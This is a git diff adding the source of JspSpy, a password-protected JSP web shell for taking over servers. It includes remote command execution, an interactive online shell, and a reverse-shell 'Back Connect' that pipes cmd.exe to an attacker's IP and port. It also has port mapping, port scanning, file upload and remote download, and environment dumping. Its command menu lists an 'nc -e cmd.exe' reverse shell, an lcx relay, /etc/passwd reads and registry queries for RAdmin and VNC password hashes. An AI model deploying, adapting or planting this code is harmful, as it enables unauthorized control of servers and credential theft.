+JSession.setAttribute("done","Stop Success!");
+ins.get("vmp").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MapPortInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String localIP = request.getParameter("localIP");
+String localPort = request.getParameter("localPort");
+final String remoteIP = request.getParameter("remoteIP");
+final String remotePort = request.getParameter("remotePort");
+if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort))
+return;
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket s = (ServerSocket)obj;
+s.close();
+}
+final ServerSocket server = new ServerSocket();
+server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort)));
+JSession.setAttribute(PORT_MAP,server);
+new Thread(new Runnable(){
+public void run(){
+while (true) {
+Socket soc = null;
+Socket remoteSoc = null;
+DataInputStream remoteIn = null;
+DataOutputStream remoteOut = null;
+DataInputStream localIn = null;
+DataOutputStream localOut = null;
+try{
+soc = server.accept();
+remoteSoc = new Socket();
+remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort)));
+remoteIn = new DataInputStream(remoteSoc.getInputStream());
+remoteOut = new DataOutputStream(remoteSoc.getOutputStream());
+localIn = new DataInputStream(soc.getInputStream());
+localOut = new DataOutputStream(soc.getOutputStream());
+this.readFromLocal(localIn,remoteOut);
+this.readFromRemote(soc,remoteSoc,remoteIn,localOut);
+}catch(Exception ex)
+{								
+break;
+}
+}
+}
+public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){
+new Thread(new Runnable(){
+public void run(){
+while (true) {
+try{
+byte[] data = new byte[100];
+int len = localIn.read(data);
+while (len != -1) {
+remoteOut.write(data,0,len);
+len = localIn.read(data);
+}
+}catch (Exception e) {
+break;
+}
+}
+}
+}).start();
+}
+public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){
+new Thread(new Runnable(){
+public void run(){
+while(true) {
+try{
+byte[] data = new byte[100];
+int len = remoteIn.read(data);
+while (len != -1) {
+localOut.write(data,0,len);
+len = remoteIn.read(data);
+}
+}catch (Exception e) {
+try{
+soc.close();
+remoteSoc.close();
+}catch(Exception ex) {
+}
+break;
+}
+}
+}
+}).start();
+}
+}).start();
+JSession.setAttribute("done","Map Port Success!");
+JSession.setAttribute("localIP",localIP);
+JSession.setAttribute("localPort",localPort);
+JSession.setAttribute("remoteIP",remoteIP);
+JSession.setAttribute("remotePort",remotePort);
+response.sendRedirect(SHELL_NAME+"?o=vmp");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VBackConnect
+private static class VbcInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+Object ip = JSession.getAttribute("ip");
+Object port = JSession.getAttribute("port");
+Object program = JSession.getAttribute("program");
+Object done = JSession.getAttribute("done");
+JSession.removeAttribute("ip");
+JSession.removeAttribute("port");
+JSession.removeAttribute("program");
+JSession.removeAttribute("done");
+if (Util.isEmpty(ip))
+ip = request.getRemoteAddr();
+if (Util.isEmpty(port) || !Util.isInteger(port.toString()))
+port = "4444";
+if (Util.isEmpty(program))
+program = "cmd.exe";
+if (!Util.isEmpty(done))
+Util.outMsg(out,done.toString());
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<input type=\"hidden\" name=\"o\" value=\"backConnect\">"+
+"  <table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td><h2 id=\"Bin_H2_Title\">Back Connect &gt;&gt;</h2>"+
+"      <div id=\"hOWTm\">"+
+"      <table width=\"100%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"      <tr align=\"center\">"+
+"        <td style=\"width:5%\"></td>"+
+"        <td  align=\"center\">Your Ip :"+
+"          <input name=\"ip\" id=\"ip\" type=\"text\" class=\"input\" size=\"20\" value=\""+ip+"\" />"+
+"          Your Port :"+
+"          <input name=\"port\" id=\"port\" type=\"text\" class=\"input\" size=\"20\" value=\""+port+"\" />Program To Back :"+
+"          <input name=\"program\" id=\"program\" type=\"text\" value=\""+program+"\" class=\"input\" size=\"20\" value=\"d\" /></td>"+
+"      </tr>"+
+"      <tr align=\"center\">"+
+"        <td colspan=\"2\"><br/>"+
+"          <input type=\"submit\" name=\"FJE\" value=\"Connect\" id=\"FJE\" class=\"bt\" />"+
+"    </td>"+
+"    </tr>"+
+"	</table>"+
+"    </div>"+
+"</td>"+
+"</tr>"+
+"</table>"+
+"</form>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BackConnectInvoker extends DefaultInvoker {
+public boolean doAfter(){return false;}
+public boolean doBefore(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String ip = request.getParameter("ip");
+String port = request.getParameter("port");
+String program = request.getParameter("program");
+if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port))
+return;
+Socket socket = new Socket(ip,Integer.parseInt(port));
+Process process = Runtime.getRuntime().exec(program);
+(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start();
+(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start();
+JSession.setAttribute("done","Back Connect Success!");
+JSession.setAttribute("ip",ip);
+JSession.setAttribute("port",port);
+JSession.setAttribute("program",program);
+response.sendRedirect(SHELL_NAME+"?o=vbc");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class JspEnvInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"      <tr>"+
+"        <td><h2 id=\"Ninty_H2_Title\">System Properties &gt;&gt;</h2>"+
+"          <div id=\"ghaB\">"+
+"            <hr style=\" border: 1px solid #ddd;height:0px;\"/>"+
+"            <ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+Properties pro = System.getProperties();
+Enumeration names = pro.propertyNames();
+while (names.hasMoreElements()){
+String name = (String)names.nextElement();
+out.println("<li><u>"+Util.htmlEncode(name)+" : </u>"+Util.htmlEncode(pro.getProperty(name))+"</li>");
+}
+out.println("</ul><h2 id=\"Ninty_H2_Mac\">System Environment &gt;&gt;</h2><hr style=\" border: 1px solid #ddd;height:0px;\"/><ul id=\"Ninty_Ul_Sys\" class=\"info\">");
+Map<String,String> envs = System.getenv();
+Set<Map.Entry<String,String>> entrySet = envs.entrySet();
+for (Map.Entry<String,String> en:entrySet) {
+out.println("<li><u>"+Util.htmlEncode(en.getKey())+" : </u>"+Util.htmlEncode(en.getValue())+"</li>");
+}
+out.println("</ul></div></td>"+
+"      </tr>"+
+"    </table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class TopInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" name=\"doForm\"></form>"+
+"<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">"+
+"	<tr class=\"head\">"+
+"		<td><span style=\"float:right;\"><a href=\"http://www.forjj.com\" target=\"_blank\">JspSpy Ver: 2009</a></span>"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")</td>"+
+"	</tr>"+
+"	<tr class=\"alt1\">"+
+"		<td><a href=\"javascript:doPost({o:'logout'});\">Logout</a> | "+
+"			<a href=\"javascript:doPost({o:'fileList'});\">File Manager</a> | "+
+"			<a href=\"javascript:doPost({o:'vConn'});\">DataBase Manager</a> | "+
+"			<a href=\"javascript:doPost({o:'vs'});\">Execute Command</a> | "+
+"			<a href=\"javascript:doPost({o:'vso'});\">Shell OnLine</a> | "+
+"			<a href=\"javascript:doPost({o:'vbc'});\">Back Connect</a> | "+
+"			<a href=\"javascript:doPost({o:'vPortScan'});;\">Port Scan</a> | "+
+"			<a href=\"javascript:doPost({o:'vd'});\">Download Remote File</a> | "+
+"			<a href=\"javascript:;doPost({o:'clipboard'});\">ClipBoard</a> | "+
+"			<a href=\"javascript:doPost({o:'vRemoteControl'});\">Remote Control</a> | "+
+"			<a href=\"javascript:doPost({o:'vmp'});\">Port Map</a> | "+
+"			<a href=\"javascript:doPost({o:'jspEnv'});\">JSP Env</a> "+
+"	</tr>"+
+"</table>");
+if (JSession.getAttribute(MSG) != null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+} 
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VOnLineShellInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script>"+
+"				function $(id) {"+
+"					return document.getElementById(id);"+
+"				}"+
+"				var ie = window.navigator.userAgent.toLowerCase().indexOf(\"msie\") != -1;"+
+"				window.onload = function(){"+
+"					setInterval(function(){"+
+"						if ($(\"autoscroll\").checked)"+
+"						{"+
+"							var f = window.frames[\"echo\"];"+
+"							if (f && f.document && f.document.body)"+
+"							{"+
+"								if (!ie)"+
+"								{"+
+"									if (f.document.body.offsetHeight)"+
+"									{"+
+"										f.scrollTo(0,parseInt(f.document.body.offsetHeight)+1);"+
+"									}"+
+"								} else {"+
+"									f.scrollTo(0,parseInt(f.document.body.scrollHeight)+1);"+
+"								}"+
+"							}"+
+"						}"+
+"					},500);"+
+"				}"+
+"			</script>");
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">"+
+"  <tr>"+
+"    <td>");
+out.println("<h2>Shell OnLine &raquo;</h2><br/>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\" target=\"echo\" onsubmit=\"$('cmd').focus()\">"+
+"			<input type=\"submit\" value=\" start \" class=\"bt\">"+
+"				<input type=\"text\" name=\"exe\" style=\"width:300px\" class=\"input\" value=\"c:\\windows\\system32\\cmd.exe\"/>"+
+"				<input type=\"hidden\" name=\"o\" value=\"online\"/><input type=\"hidden\" name=\"type\" value=\"start\"/><span class=\"tip\">Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo</span>"+
+"			</form>"+
+"			<hr/>"+
+"				<iframe class=\"secho\" name=\"echo\" src=\"\">"+
+"				</iframe>"+
+"				<form action=\""+SHELL_NAME+"\" method=\"post\" onsubmit=\"this.submit();$('cmd').value='';return false;\" target=\"asyn\">"+
+"					<input type=\"text\" id=\"cmd\" name=\"cmd\" class=\"input\" style=\"width:80%\">"+
+"					<input name=\"o\" id=\"o\" type=\"hidden\" value=\"online\"/><input type=\"hidden\" id=\"ddtype\" name=\"type\" value=\"ecmd\"/>"+
+"					<select onchange=\"$('cmd').value = this.value;$('cmd').focus()\">"+
+"						<option value=\"\" selected> </option>"+
+"						<option value=\"uname -a\">uname -a</option>"+
+"						<option value=\"cat /etc/issue\">issue</option>"+
+"						<option value=\"cat /etc/passwd\">passwd</option>"+
+"						<option value=\"netstat -an\">netstat -an</option>"+
+"						<option value=\"net user\">net user</option>"+
+"						<option value=\"tasklist\">tasklist</option>"+
+"						<option value=\"tasklist /svc\">tasklist /svc</option>"+
+"						<option value=\"net start\">net start</option>"+
+"						<option value=\"net stop policyagent /yes\">net stop</option>"+
+"						<option value=\"nbtstat -A IP\">nbtstat -A</option>"+
+"						<option value='reg query \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v \"PortNumber\"'>reg query</option>"+
+"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\RAdmin\\v2.0\\Server\\Parameters\\\" /v \"Parameter\"'>radmin hash</option>"+
+"						<option value='reg query \"HKEY_LOCAL_MACHINE\\SOFTWARE\\RealVNC\\WinVNC4\" /v \"password\"'>vnc hash</option>"+
+"						<option value=\"nc -e cmd.exe 192.168.230.1 4444\">nc</option>"+
+"						<option value=\"lcx -slave 192.168.230.1 4444 127.0.0.1 3389\">lcx</option>"+
+"						<option value=\"systeminfo\">systeminfo</option>"+
+"						<option value=\"net localgroup\">view groups</option>"+
+"						<option value=\"net localgroup administrators\">view admins</option>"+
+"					</select>"+
+"					<input type=\"checkbox\" checked=\"checked\" id=\"autoscroll\">Auto Scroll"+
+"					<input type=\"button\" value=\"Stop\" class=\"bt\" onclick=\"$('ddtype').value='stop';this.form.submit()\">"+
+"				</form>"+
+"			<iframe style=\"display:none\" name=\"asyn\"></iframe>"
+);
+out.println("    </td>"+
+"  </tr>"+
+"</table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class OnLineInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String type = request.getParameter("type");
+if (Util.isEmpty(type))
+return;
+if (type.toLowerCase().equals("start")) {
+String exe = request.getParameter("exe");
+if (Util.isEmpty(exe))
+return;
+Process pro = Runtime.getRuntime().exec(exe);
+ByteArrayOutputStream outs = new ByteArrayOutputStream();
+response.setContentLength(100000000);
+response.setContentType("text/html;charset="+Charset.defaultCharset().name());
+OnLineProcess olp = new OnLineProcess(pro);
+JSession.setAttribute(SHELL_ONLINE,olp);
+new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start();
+new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start();
+new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//閿欒淇℃伅娴併��
+Thread.sleep(1000 * 60 * 60 * 24);
+} else if (type.equals("ecmd")) {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+String cmd = request.getParameter("cmd");
+if (Util.isEmpty(cmd))
+return;
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.setCmd(cmd);
+} else {
+Object o = JSession.getAttribute(SHELL_ONLINE);
+if (o == null)
+return;
+OnLineProcess olp = (OnLineProcess)o;
+olp.stop();
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+
+static{
+ins.put("script",new ScriptInvoker());
+ins.put("before",new BeforeInvoker());
+ins.put("after",new AfterInvoker());
+ins.put("deleteBatch",new DeleteBatchInvoker());
+ins.put("clipboard",new ClipBoardInvoker());
+ins.put("vRemoteControl",new VRemoteControlInvoker());
+ins.put("gc",new GcInvoker());
+ins.put("vPortScan",new VPortScanInvoker());
+ins.put("portScan",new PortScanInvoker());
+ins.put("vConn",new VConnInvoker());
+ins.put("dbc",new DbcInvoker());
+ins.put("executesql",new ExecuteSQLInvoker());
+ins.put("vLogin",new VLoginInvoker());
+ins.put("login",new LoginInvoker());
+ins.put("filelist", new FileListInvoker());
+ins.put("logout",new LogoutInvoker());
+ins.put("upload",new UploadInvoker());
+ins.put("copy",new CopyInvoker());
+ins.put("bottom",new BottomInvoker());
+ins.put("vCreateFile",new VCreateFileInvoker());
+ins.put("vEdit",new VEditInvoker());
+ins.put("createFile",new CreateFileInvoker());
+ins.put("vEditProperty",new VEditPropertyInvoker());
+ins.put("editProperty",new EditPropertyInvoker());
+ins.put("vs",new VsInvoker());
+ins.put("shell",new ShellInvoker());
+ins.put("down",new DownInvoker());
+ins.put("vd",new VdInvoker());
+ins.put("downRemote",new DownRemoteInvoker());
+ins.put("index",new IndexInvoker());
+ins.put("mkdir",new MkDirInvoker());
+ins.put("move",new MoveInvoker());
+ins.put("removedir",new RemoteDirInvoker());
+ins.put("packBatch",new PackBatchInvoker());
+ins.put("pack",new PackInvoker());
+ins.put("unpack",new UnPackInvoker());
+ins.put("vmp",new VmpInvoker());
+ins.put("vbc",new VbcInvoker());
+ins.put("backConnect",new BackConnectInvoker());
+ins.put("jspEnv",new JspEnvInvoker());
+ins.put("smp",new SmpInvoker());
+ins.put("mapPort",new MapPortInvoker());
+ins.put("top",new TopInvoker());
+ins.put("vso",new VOnLineShellInvoker());
+ins.put("online",new OnLineInvoker());
+}
+%>
+<%
+try {
+String o = request.getParameter("o");
+if (!Util.isEmpty(o)) {
+Invoker in = ins.get(o);
+if (in == null) {
+response.sendRedirect(SHELL_NAME+"?o=index");
+} else {
+if (in.doBefore()) {
+String path = request.getParameter("folder");
+if (!Util.isEmpty(path))
+session.setAttribute(CURRENT_DIR,path);
+ins.get("before").invoke(request,response,session);
+ins.get("script").invoke(request,response,session);
+ins.get("top").invoke(request,response,session);
+}
+in.invoke(request,response,session);
+if (!in.doAfter()) {
+return;
+}else{
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+}
+} else {
+response.sendRedirect(SHELL_NAME+"?o=index");
+}					
+} catch (Exception e) {
+ByteArrayOutputStream bout = new ByteArrayOutputStream();
+e.printStackTrace(new PrintStream(bout));
+session.setAttribute(CURRENT_DIR,SHELL_DIR);
+Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","<br/>"),"left");
+bout.close();
+out.flush();
+ins.get("bottom").invoke(request,response,session);
+ins.get("after").invoke(request,response,session);
+}
+%>
\ No newline at end of file
diff --git a/jsp/JspSpyJDK51.jsp b/jsp/JspSpyJDK51.jsp
new file mode 100644
index 0000000..a08fc0a
--- /dev/null
+++ b/jsp/JspSpyJDK51.jsp
@@ -0,0 +1,2323 @@
+锘�<%@page pageEncoding="utf-8"%>
+<%@page import="java.io.*"%>
+<%@page import="java.util.*"%>
+<%@page import="java.util.regex.*"%>
+<%@page import="java.sql.*"%>
+<%@page import="java.nio.charset.*"%>
+<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
+<%@page import="java.text.*"%>
+<%@page import="java.net.*"%>
+<%@page import="java.util.zip.*"%>
+<%@page import="java.awt.*"%>
+<%@page import="java.awt.image.*"%>
+<%@page import="javax.imageio.*"%>
+<%@page import="java.awt.datatransfer.DataFlavor"%>
+<%@page import="java.util.prefs.Preferences"%>
+<%!
+/**
+* Code By Ninty
+* Date 2009-12-17
+* Blog http://www.Forjj.com/
+* Yue . I Love You.
+*/
+private static final String PW = "ninty"; //password
+private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd";
+private static final String REQUEST_CHARSET = "ISO-8859-1";
+private static final String PAGE_CHARSET = "UTF-8";
+private static final String CURRENT_DIR = "currentdir";
+private static final String MSG = "SHOWMSG";
+private static final String PORT_MAP = "PMSA";
+private static final String DBO = "DBO";
+private static final String SHELL_ONLINE = "SHELL_ONLINE";
+private static String SHELL_NAME = "";
+private static String WEB_ROOT = null; 
+private static String SHELL_DIR = null;
+public static Map<String,Invoker> ins = new HashMap<String,Invoker>();
+private static class MyRequest extends HttpServletRequestWrapper {
+public MyRequest(HttpServletRequest req) {
+super(req);
+}
+public String getParameter(String name) {
+try {
+String value = super.getParameter(name);
+if (name == null)
+return null;
+return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET);
+} catch (Exception e) {
+return null;
+}
+}
+}
+private static class DBOperator{
+private Connection conn = null;
+private Statement stmt = null;
+private String driver;
+private String url;
+private String uid;
+private String pwd;
+public DBOperator(String driver,String url,String uid,String pwd) throws Exception {
+this(driver,url,uid,pwd,false);
+}
+public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception {
+Class.forName(driver);
+if (connect)
+this.conn = DriverManager.getConnection(url,uid,pwd);
+this.url = url;
+this.driver = driver;
+this.uid = uid;
+this.pwd = pwd;
+}
+public void connect() throws Exception{
+this.conn = DriverManager.getConnection(url,uid,pwd);
+}
+public Object execute(String sql) throws Exception {
+if (isValid()) {
+stmt = conn.createStatement();
+if (stmt.execute(sql)) {
+return stmt.getResultSet();
+} else {
+return stmt.getUpdateCount();
+}
+}
+throw new Exception("Connection is inValid.");
+}
+public void closeStmt() throws Exception{
+if (this.stmt != null)
+stmt.close();
+}
+public boolean isValid() throws Exception {
+return conn != null && !conn.isClosed();
+}
+public void close() throws Exception {
+if (isValid()) {
+closeStmt();
+conn.close();
+}
+}
+public boolean equals(Object o) {
+if (o instanceof DBOperator) {
+DBOperator dbo = (DBOperator)o;
+return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd);
+}
+return false;
+}
+}
+private static class StreamConnector extends Thread {
+private InputStream is;
+private OutputStream os;  
+public StreamConnector( InputStream is, OutputStream os ){
+this.is = is;
+this.os = os;
+}			  
+public void run(){
+BufferedReader in  = null;
+BufferedWriter out = null;
+try{
+in  = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[8192];
+int length;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+out.write( buffer, 0, length );
+out.flush();
+}
+} catch(Exception e){}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){}
+}
+}
+private static class OnLineProcess {
+private String cmd = "first";
+private Process pro;
+public OnLineProcess(Process p){
+this.pro = p;
+}
+public void setPro(Process p) {
+this.pro = p;
+}
+public void setCmd(String c){
+this.cmd = c;
+}
+public String getCmd(){
+return this.cmd;
+}
+public Process getPro(){
+return this.pro;
+}
+public void stop(){
+this.pro.destroy();
+}
+}
+private static class OnLineConnector extends Thread {
+private OnLineProcess ol = null;
+private InputStream is;
+private OutputStream os;
+private String name;
+public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){
+this.is = is;
+this.os = os;
+this.name = name;
+this.ol = ol;
+}
+public void run(){
+BufferedReader in  = null;
+BufferedWriter out = null;
+try{
+in  = new BufferedReader( new InputStreamReader(this.is));
+out = new BufferedWriter( new OutputStreamWriter(this.os));
+char buffer[] = new char[128];
+if(this.name.equals("exeRclientO")) {
+//from exe to client
+int length = 0;
+while((length = in.read( buffer, 0, buffer.length ))>0){
+String str = new String(buffer, 0, length);
+str = str.replace("&","&amp;").replace("<","&lt;").replace(">","&gt;");
+str = str.replace(""+(char)13+(char)10,"<br/>");
+str = str.replace("\n","<br/>");
+out.write(str.toCharArray(), 0, str.length());
+out.flush();
+}
+} else {
+//from client to exe
+while(true) {
+while(this.ol.getCmd() == null) {
+Thread.sleep(500);
+}
+if (this.ol.getCmd().equals("first")) {
+this.ol.setCmd(null);
+continue;
+}
+this.ol.setCmd(this.ol.getCmd() + (char)10);
+char[] arr = this.ol.getCmd().toCharArray();
+out.write(arr,0,arr.length);
+out.flush();
+this.ol.setCmd(null);
+}
+}
+} catch(Exception e){
+}
+try{
+if(in != null)
+in.close();
+if(out != null)
+out.close();
+} catch( Exception e ){
+}
+}
+}
+private static class Table{
+private ArrayList<Row> rows = null;
+private boolean echoTableTag = false;
+public void setEchoTableTag(boolean v) {
+this.echoTableTag = v;
+}
+public Table(){
+this.rows = new ArrayList<Row>();
+}
+public void addRow(Row r) {
+this.rows.add(r);
+}
+public String toString(){
+StringBuilder html = new StringBuilder();
+if (echoTableTag)
+html.append("<table>");
+for (Row r:rows) {
+html.append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">");
+for (Column c:r.getColumns()) {
+html.append("<td nowrap>");
+String vv = Util.htmlEncode(Util.getStr(c.getValue()));
+if (vv.equals(""))
+vv = "&nbsp;";
+html.append(vv);
+html.append("</td>");
+}
+html.append("</tr>");
+}
+if (echoTableTag)
+html.append("</table>");
+return html.toString();
+}
+}
+private static class Row{
+private ArrayList<Column> cols = null;
+public Row(){
+this.cols = new ArrayList<Column>();
+}
+public void addColumn(Column n) {
+this.cols.add(n);
+}
+public ArrayList<Column> getColumns(){
+return this.cols;
+}
+}
+private static class Column{
+private String value;
+public Column(String v){
+this.value = v;
+}
+public String getValue(){
+return this.value;
+}
+}
+private static class Util{
+public static boolean isEmpty(String s) {
+return s == null || s.trim().equals("");
+}
+public static boolean isEmpty(Object o) {
+return o == null || isEmpty(o.toString());
+}
+public static String getSize(long size,char danwei) {
+if (danwei == 'M') {
+double v =  formatNumber(size / 1024.0 / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'G');
+}else {
+return v + "M";
+}
+} else if (danwei == 'G') {
+return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G";
+} else if (danwei == 'K') {
+double v = formatNumber(size / 1024.0,2);
+if (v > 1024) {
+return getSize(size,'M');
+} else {
+return v + "K";
+}
+} else if (danwei == 'B') {
+if (size > 1024) {
+return getSize(size,'K');
+}else {
+return size + "B";
+}
+}
+return ""+0+danwei;
+}
+public static double formatNumber(double value,int l) {
+NumberFormat format = NumberFormat.getInstance();
+format.setMaximumFractionDigits(l);
+format.setGroupingUsed(false);
+return new Double(format.format(value));
+}
+public static boolean isInteger(String v) {
+if (isEmpty(v))
+return false;
+return v.matches("^\\d+$");
+}
+public static String formatDate(long time) {
+SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss");
+return format.format(new java.util.Date(time));
+}
+public static String convertPath(String path) {
+return path != null ? path.replace("\\","/") : "";
+}
+public static String htmlEncode(String v) {
+if (isEmpty(v))
+return "";
+return v.replace("&","&amp;").replace("<","&lt;").replace(">","&gt;");
+}
+public static String getStr(String s) {
+return s == null ? "" :s;
+}
+public static String getStr(Object s) {
+return s == null ? "" :s.toString();
+}
+public static String exec(String regex, String str, int group) {
+Pattern pat = Pattern.compile(regex);
+Matcher m = pat.matcher(str);
+if (m.find())
+return m.group(group);
+return null;
+}
+public static void outMsg(Writer out,String msg) throws Exception {
+outMsg(out,msg,"center");
+}
+public static void outMsg(Writer out,String msg,String align) throws Exception {
+if (msg.indexOf("java.lang.ClassNotFoundException") != -1)
+msg = "Can Not Find The Driver!<br/>" + msg;
+out.write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:"+align+";font-weight:bold;margin:10px\">"+msg+"</div>");
+}
+}
+private static class UploadBean {
+private String fileName = null;
+private String suffix = null;
+private String savePath = "";
+private ServletInputStream sis = null;
+private byte[] b = new byte[1024];
+public UploadBean() {
+}
+public void setSavePath(String path) {
+this.savePath = path;
+}
+public void parseRequest(HttpServletRequest request) throws IOException {
+sis = request.getInputStream();
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!= -1) {
+s = new String(b, 0, a,PAGE_CHARSET);
+if ((k = s.indexOf("filename=\""))!= -1) {
+s = s.substring(k + 10);
+k = s.indexOf("\"");
+s = s.substring(0, k);
+File tF = new File(s);
+if (tF.isAbsolute()) {
+fileName = tF.getName();
+} else {
+fileName = s;
+}
+k = s.lastIndexOf(".");
+suffix = s.substring(k + 1);
+upload();
+}
+}
+}
+private void upload() {
+try {
+FileOutputStream out = new FileOutputStream(new File(savePath,fileName));
+int a = 0;
+int k = 0;
+String s = "";
+while ((a = sis.readLine(b,0,b.length))!=-1) {
+s = new String(b, 0, a);
+if ((k = s.indexOf("Content-Type:"))!=-1) {
+break;
+}
+}
+sis.readLine(b,0,b.length);
+while ((a = sis.readLine(b,0,b.length)) != -1) {
+s = new String(b, 0, a);
+if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) {
+break;
+}
+out.write(b, 0, a);
+}
+out.close();
+} catch (IOException ioe) {
+ioe.printStackTrace();
+}
+}
+}
+%>
+<%
+SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1);
+String myAbsolutePath = application.getRealPath(request.getServletPath());
+if (Util.isEmpty(myAbsolutePath)) {//for weblogic
+SHELL_NAME = request.getServletPath();
+myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString();
+SHELL_NAME=request.getContextPath()+SHELL_NAME;
+WEB_ROOT = new File(application.getResource("/").getPath()).toString();
+} else {
+WEB_ROOT = application.getRealPath("/");
+}
+SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator)));
+if (session.getAttribute(CURRENT_DIR) == null)
+session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR));
+request = new MyRequest(request);
+if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) {
+String o = request.getParameter("o");
+if (o != null &&  o.equals("login")) {
+ins.get("login").invoke(request,response,session);
+return;
+} else if (o != null && o.equals("vLogin")) {
+ins.get("vLogin").invoke(request,response,session);
+return;
+} else {
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+return;
+}
+}
+%>
+<%!
+private static interface Invoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception;
+public boolean doBefore();
+public boolean doAfter();
+}
+private static class DefaultInvoker implements Invoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+}
+public boolean doBefore(){
+return true;
+}
+public boolean doAfter() {
+return true;
+}
+}
+private static class ScriptInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+out.println("<script type=\"text/javascript\">"+
+"	String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};"+
+"	function fso(obj) {"+
